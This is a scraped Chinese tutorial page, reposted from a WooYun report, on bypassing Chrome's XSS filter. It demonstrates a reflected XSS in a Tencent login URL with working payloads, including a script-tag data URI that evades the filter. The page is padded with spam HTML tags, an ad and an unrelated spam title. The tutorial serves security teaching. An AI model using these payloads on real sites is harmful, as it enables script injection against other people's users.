<ruby id="bdb3f"></ruby>

    <p id="bdb3f"><cite id="bdb3f"></cite></p>

      <p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>
        <p id="bdb3f"><cite id="bdb3f"></cite></p>

          <pre id="bdb3f"></pre>
          <pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

          <ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
          <pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre><output id="bdb3f"></output><p id="bdb3f"></p><p id="bdb3f"></p>

          <pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

                <ruby id="bdb3f"></ruby>

                ThinkChat2.0新版上線,更智能更精彩,支持會話、畫圖、視頻、閱讀、搜索等,送10W Token,即刻開啟你的AI之旅 廣告
                # 17\. XSS 過濾器繞過 [通用繞過] > 來源:[17\. XSS 過濾器繞過 \[通用繞過\]](http://www.wooyun.org/bugs/wooyun-2010-016672) ## 簡要描述 關于反射型的基本東西,暫時就到這啦,如果后面有什么好的 case,再做增補。最近,有些人會問到怎么繞過瀏覽器的 XSS 過濾 器,所以從這節開始,給出點繞過的例子。當然這些繞過瀏覽器的方法,不是萬能的。不同瀏覽器,不同場景都會存在差異。滿足場景 要求時,才可以使用。 此文給出的是一個來自 sogili 分享的 chrome 下繞過過濾器的方法,在騰訊某處 XSS 上的應用。 這一類都算是“結合了一定場景”,繞過了瀏覽器自身的防御機制,具有一定的通用性,我們稱為“通用繞過”(瞎起的名字,別在意)。但是在后續版本的瀏覽器中,這些技巧可能會被瀏覽器干掉從而失效。再次強調:通用不是全部都行,意思是所適用的場景實際發生的概率比較高! ## 詳細說明 1\. 其實就是個普通的 XSS 點,uin 參數沒有對任何字符進行過濾。 ``` http://bangbang.qq.com/php/login?game=roco&uin](http://bangbang.qq.com/php/login?game=roco&uin)="><img src=1 onerror=alert(1)>&world=5&roleid=44583443&level=8&role=%2 ``` 2\. 正是由于這個點什么都沒過濾,瀏覽器自身的防御機制也最好發揮作用,瞧瞧,chrome 攔截了。。 ![image](https://box.kancloud.cn/2016-03-23_56f2504500542.jpg) 有的新手,不知道有過濾器的,更是會覺得 “啊,這是怎么回事,怎么不行啊,明明可以的。。” 我們只要看到 console 里有上面那句,就說明 chrome 的過濾器大發神威了!! 3\. 我們也看看源碼。 ![image](https://box.kancloud.cn/2016-03-23_56f25045219ee.jpg) 危害部分被和諧了。 4\. 那么怎么繞過呢? 這里直接說方法。 5\. 首先要求缺陷點,允許 `<` , `>` 。其次,要求缺陷點的后方存在 `</script>` 標簽。 我們看看當前的這個點的代碼。 ``` ... <input type="hidden" id="sClientUin" value=""><img src=1 onerror=alert(1)>"> ... <script type="text/javascript" src="http://pingjs.qq.com/tcss.ping.js"></script> ... ``` 6\. 可以看到上面的要求均滿足。我們就可以使用以下技巧。 7\. 代入到我們的利用代碼里。 ``` http://bangbang.qq.com/php/login?game=roco&uin="><script src=data:,alert(1)<!--&world=5&roleid=44583443&level=8&role=%2 ``` 這次,我們就成功啦。 ![image](https://box.kancloud.cn/2016-03-23_56f250453e660.jpg) ## 修復方案 參見教程 (1\. 什么都沒過濾的入門情況)
                  <ruby id="bdb3f"></ruby>

                  <p id="bdb3f"><cite id="bdb3f"></cite></p>

                    <p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>
                      <p id="bdb3f"><cite id="bdb3f"></cite></p>

                        <pre id="bdb3f"></pre>
                        <pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

                        <ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
                        <pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre><output id="bdb3f"></output><p id="bdb3f"></p><p id="bdb3f"></p>

                        <pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

                              <ruby id="bdb3f"></ruby>

                              哎呀哎呀视频在线观看